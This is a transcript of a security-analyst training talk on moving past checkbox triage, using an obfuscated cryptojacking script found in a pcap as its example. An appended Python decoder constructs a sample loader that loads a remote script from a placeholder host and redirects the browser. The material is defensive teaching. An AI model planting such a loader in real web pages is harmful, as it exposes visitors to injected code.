Following The Breadcrumbs · 2018-09-06 · Presented by: SSgt Samuel Kimmons · 24 slides

Page 1:

Following The Breadcrumbs
Presented by: SSgt Samuel Kimmons

x56 x32

Page 2:

Before We Begin
• All thoughts and opinions expressed by me during this presentation are my own and do not represent those of my employer.

x56 x32 x68 x68

Page 3:

$> whoami: Samuel Kimmons

Attribs:
• Cyber Threat Emulator (Pentesting) & Air Force Cyberspace Defense Analyst (ACD-O)
• 33rd Network Warfare Squadron
• Also known as: The Air Force Computer Emergency Response Team (AFCERT)
• GIAC Web Application Penetration Tester (GWAPT)
• GIAC Certified Incident Handler (GCIH)
• Pursuing an M.S. in Cyber Security at New York University (NYU)
• In My Spare Time:
  • Capture The Flag (CTF) Player
  • Python Scripter
  • Certification Collector

How To Contact Me?
Official email: [email protected]
Personal email: [email protected]
@5pecial__K via Twitter

x56 x32 x68 x68 x64 x43

Page 4:

So What Does That Mean?

x56 x32 x68 x68 x64 x43 x42 x35

• I’m passionate about Cyber Security.
• I love solving complex problems.
• I attempt to look at situations a bit differently.
• This stuff is just all around fun.

Page 5:

Let’s Jump Right In

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33

Imagine you’re an analyst starting your day:
• You grab your coffee.
• Get logged into the SIEM.
• Throw on some headphones and get to work.

All of a sudden, alerts start firing!

What could it be?
• An APT?
• Malicious file execution?
• Or maybe nothing at all?

Page 6:

Just Pick One!

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67

What’s your organization’s policy?
• First in the queue?
• Severity level?
• Or is it random?

For this scenario, let’s go with: Trojanware.

Trojanware:
• Simply a program that’s doing something it isn’t supposed to be doing, usually while posing as something legitimate.

Page 7:

Event Selected: Nothing odd here?

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32

Seems like a no brainer investigation.

Just follow your procedural steps:
• Check the pcap
• Check the IPs/URLs
• Run any hashes through VirusTotal, ThreatMiner, AlienVault, etc.

Maybe it’s an internal-to-internal IP pair; that means non-malicious, right? Not necessarily: an already-compromised host talking to another internal host looks exactly like that.

Why is the alert firing?

Page 8:

Mark It As Benign

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c

The alert fired on Trojanware; that’s probably because something performed an out-of-the-ordinary action.
• All of the sensors / security devices gave you a thumbs up.
• But what about that block of code in the pcap? Maybe the analyst thought it was just a part of the session data?

At this point a lot of junior and some experienced analysts would close it out and move on.

Page 9:

Was The Analyst Wrong?

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47

Maybe nothing seemed truly odd or out of place. What they followed:
• Rinse and Repeat
• Cut and Dry
• Copy and Paste
Styles of analysis that they most likely follow for every investigation.

Is the Analyst to blame, or are the box-checking styles of analysis the root cause? Maybe it’s the organization that’s locking them into these analytical methodologies?

These limiting analytical methodologies can be a plague upon Cyber Security Operations in an Organization.

So why do we lock our analysts into these procedural thinking methods? Shouldn’t we empower them to think differently?

Page 10:

Run It Again!

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a

Let’s start over, but without the limiting factors of a checkbox methodology.

Empower the Analyst to think more freely, and approach each data point in a dynamic way.

Equip your Sherlock Holmes hat and get to it!

Page 11:

Let’s Try This Again

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47

Imagine that the first run through was pretty accurate.

The Analyst verified that none of the available data was malicious. Well, not exactly…

Looks like a typical blob of data in a pcap…

Does it though?

Do you remember that snippet of code?

Page 12:

Moving Beyond
Taking a step outside of the old methodology:
• We can come to the conclusion that there is some level of encoding at play here.
• Maybe hex or Base64 encoding. A quick check: a Base64 blob uses A–Z, a–z, 0–9, + and /, usually padded with one or two trailing = signs, while hex uses only 0–9 and a–f, often with an x, \x or 0x prefix on each byte.
• Run it through some tools: a Base64 decoder, CyberChef, etc.

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c

Page 13:

Now We’re Cooking
The structure of the code starts to become apparent. Now remember, this alert was most likely triggered from web traffic. Could it be some malicious script?

I think we’re on to something here! Hex encoding? The plot thickens!

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d

Page 14:

Hex Be Gone
Utilizing a tool to convert hex into plain text, we can see what’s actually going on.

Tada!

What is the script doing?
• We know it’s JavaScript.
• We can see URLs.

What if we, as the Analyst, haven’t the faintest idea what JavaScript can do?

Time to break out the ole Google-fu!

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73

Page 15:

A Few Moments Later…

Boom!

Based on the code, it appears that the JavaScript file is attempting to redirect the user.

It may not have been obvious in the beginning but a certain level of obfuscation was being used in this script.

Page 16:

Obfuscation?
What is obfuscation and how should we as Analysts approach it?

Obfuscation according to techtarget.com:

“Obfuscation is the practice of making something difficult to understand. Programming code is often obfuscated to protect intellectual property and prevent an attacker from reverse engineering a proprietary software.”

Like with every piece of technology developed for a good purpose, someone has probably weaponized it.

For example:
• DNS used for Command and Control.
• Inter-protocol exploitation.
• Etc. There are tons of examples.

Given enough time, an Analyst could attempt to reverse engineer a piece of obfuscated code by not-so-simply following the breadcrumbs. Depending on the level of complexity this may take some time. It is, however, possible!

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68

Page 17:

The Initial Run Through

Investigation Part 1:
• Straightforward.
• Analyst had restrictive guidelines.
• A simple methodology was used.

This type of approach assumes the malicious actions will jump right out at the analyst.

A simple analytical methodology may work sometimes, but that is putting a lot of faith in the tuning of your security devices.

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70

Page 18:

Final Run Through

Investigation Part 2:
• Started the same way as the first run through.
• The answer wasn’t blatantly obvious.
• Had to apply a different methodology.
• Followed the breadcrumbs, which led to our final result.

Diagram labels (in slide order): Stepping-off point → Data point → Spawned more questions → Data analyzed → Analysis-driven results

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31

Page 19:

Can You Follow The Breadcrumbs?
It’s rare!

An advanced attacker will most likely not leave simple breadcrumbs behind. More specifically, an APT!

The threats facing your organization:
• Aren’t adhering to limiting guidelines.
• Will try whatever possible to complete their objectives.

The adversary isn’t locking themselves into a procedural box.

So why should we?

Allowing our Analysts to think outside the box can greatly increase the odds of identifying nefarious actions.

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31 x63 x32 x6c x76

Page 20:

Putting The Puzzle Together

As Analysts or Investigators we’re often tasked with putting pieces of various types and amounts of data together to create an understandable picture of the events that led to an alert.

This can often be time consuming and require you to think a certain way.

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31 x63 x32 x6c x76 x62 x69

Page 21:

A Recipe For Disaster

An example that just so happens to involve breadcrumbs:
• An alert fires for Trojanware.
• A fellow Analyst asks for help.
• Began to analyze:
  • IPs / URLs = checks out, nothing odd
  • Past events = checks out, nothing odd
  • In the pcap: some type of obfuscated code
• Analyzed the code:
  • Base64 encoded
  • Decoded the JavaScript
  • Appears to also have URLs encoded in hex
  • After restoring the original data = found to be CryptoJacking malware!

Who would have ever thought that as an Analyst you would be analyzing malware on a baking site hosting a breadcrumb recipe?

x56 x32 x68 x68 x64 x43 x42 x35 x62 x33 x55 x67 x63 x32 x56 x6c x49 x47 x6c x7a x49 x47 x31 x6c x63 x6d x56 x73 x65 x53 x42 x68 x62 x69 x42 x70 x62 x47 x78 x31 x63 x32 x6c x76 x62 x69 x34 x3d
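The decode chain walked through on slides 12 to 15 and summarized on slide 21 (hex dump, then Base64, then JavaScript with its URLs hidden in \xNN string escapes) as an added Python example. This is not code from the original deck or from the presenter; the sample script, the example.test hostnames and the "captured" blob are constructed inside the block so it runs offline. The slide crumbs use the same xNN notation, so the same peel() call applies to them.

```python
"""Peel the encoding layers off a pcap blob and pull IOCs out of the script.

Added example for the hex -> Base64 -> JavaScript chain described in the
slides. Not code from the original deck; the sample script, hostnames and
blob below are constructed so the example runs offline.
"""
import base64
import binascii
import re
import string

# Decorations seen on hex dumps: "x56 x32", "\x56\x32", "0x56, 0x32", "56 32".
_HEX_DECOR = re.compile(r"\\x|0x|\bx|[\s,;:]")
_B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
_JS_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
_URL = re.compile(r"""https?://[^\s'"<>)]+""")
# Assignments to location / location.href and calls to location.replace|assign.
_REDIRECT_SINK = re.compile(
    r"\b(?:(?:window|document|top|self)\.)?location(?:\.href)?\s*=(?!=)"
    r"|\blocation\.(?:replace|assign)\s*\("
)


def hex_digits(text):
    """Bare hex digits of a decorated hex dump, or None if text is not hex."""
    cleaned = _HEX_DECOR.sub("", text.strip())
    if len(cleaned) < 2 or len(cleaned) % 2:
        return None
    if not all(ch in string.hexdigits for ch in cleaned):
        return None
    return cleaned


def base64_bytes(text):
    """Strict Base64 decode of text (whitespace tolerated), or None."""
    joined = "".join(text.split())
    if len(joined) < 8 or len(joined) % 4 or not _B64_ALPHABET.match(joined):
        return None
    try:
        return base64.b64decode(joined, validate=True)
    except binascii.Error:
        return None


def peel(blob, max_layers=8):
    """Strip hex and Base64 layers until the text stops decoding.

    Returns (text, layers). Hex is tried first because every hex string is
    also a valid Base64-alphabet string. Stops at the first layer that is
    not UTF-8 text, which is how a packed binary rather than a script shows up.
    """
    current, layers = blob, []
    for _ in range(max_layers):
        digits = hex_digits(current)
        if digits is not None:
            raw, kind = bytes.fromhex(digits), "hex"
        else:
            raw, kind = base64_bytes(current), "base64"
            if raw is None:
                break
        try:
            current = raw.decode("utf-8")
        except UnicodeDecodeError:
            break
        layers.append(kind)
    return current, layers


def unescape_js(script):
    """Resolve \\xNN escapes so strings hidden inside them become readable."""
    return _JS_HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), script)


def extract_iocs(script):
    """URLs and redirect sinks found in a (possibly hex-obfuscated) script."""
    clear = unescape_js(script)
    return {
        "urls": sorted(set(_URL.findall(clear))),
        "redirect_sinks": [m.group(0) for m in _REDIRECT_SINK.finditer(clear)],
    }


def analyze(blob):
    """Full chain: peel the layers, then mine the recovered script."""
    script, layers = peel(blob)
    return {"layers": layers, "script": script, **extract_iocs(script)}


# Constructed sample: a loader that hides its script URL in \xNN escapes and
# then redirects the browser. The hosts are example.test placeholders.
SAMPLE_JS = "\n".join([
    r'var c=["\x68\x74\x74\x70\x3a\x2f\x2f\x63\x64\x6e\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x74\x65\x73\x74\x2f\x6d\x2e\x6a\x73"];',
    r'var s=document.createElement("script");s.src=c[0];document.head.appendChild(s);',
    r'window.location="https://landing.example.test/";',
])


def as_captured(script):
    """Wrap a script the way the slide blob is wrapped: Base64, then 'xNN' per byte."""
    b64 = base64.b64encode(script.encode("utf-8"))
    return " ".join("x%02x" % b for b in b64)


CAPTURED_BLOB = as_captured(SAMPLE_JS)  # stands in for the blob seen in the pcap

if __name__ == "__main__":
    result = analyze(CAPTURED_BLOB)
    print("layers:", " -> ".join(result["layers"]))
    print("urls:", result["urls"])
    print("redirect sinks:", result["redirect_sinks"])
```

Two design points matter in practice. Hex is tried before Base64 on purpose: a hex layer is also a syntactically valid Base64 string, so trying Base64 first decodes it into garbage bytes without any error. And the loop stops at the first layer that is not UTF-8, because a blob that bottoms out in binary is a dropped file, not a script, and needs a different workflow than reading JavaScript.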

Page 22:

Endgame

What have we learned?
• That we should approach every investigation in a dynamic manner.
• Our methods should be adaptable to the information we have available to us.
• There’s no way our security devices can detect everything!
• That’s where we as the Analysts come in.
• It is truly up to us to really drill down and determine if an event is malicious or simply noise in the SIEM.

Are you employing the correct analytical methodology?

The best methodology is the one that is fluid and can be implemented into every step of an investigation.

Page 23:

The Breadcrumb Challenge
So did you follow the Breadcrumbs?

You may have noticed the hex on each slide.

Challenge:

The first individual to contact me with the answer will get a copy of The Blue Team Field Manual.

Personal email: [email protected]
@5pecial__K via Twitter (two underscores)

Page 24:

Questions?
Contact info:
Official email: [email protected]
Personal email: [email protected]
@5pecial__K via Twitter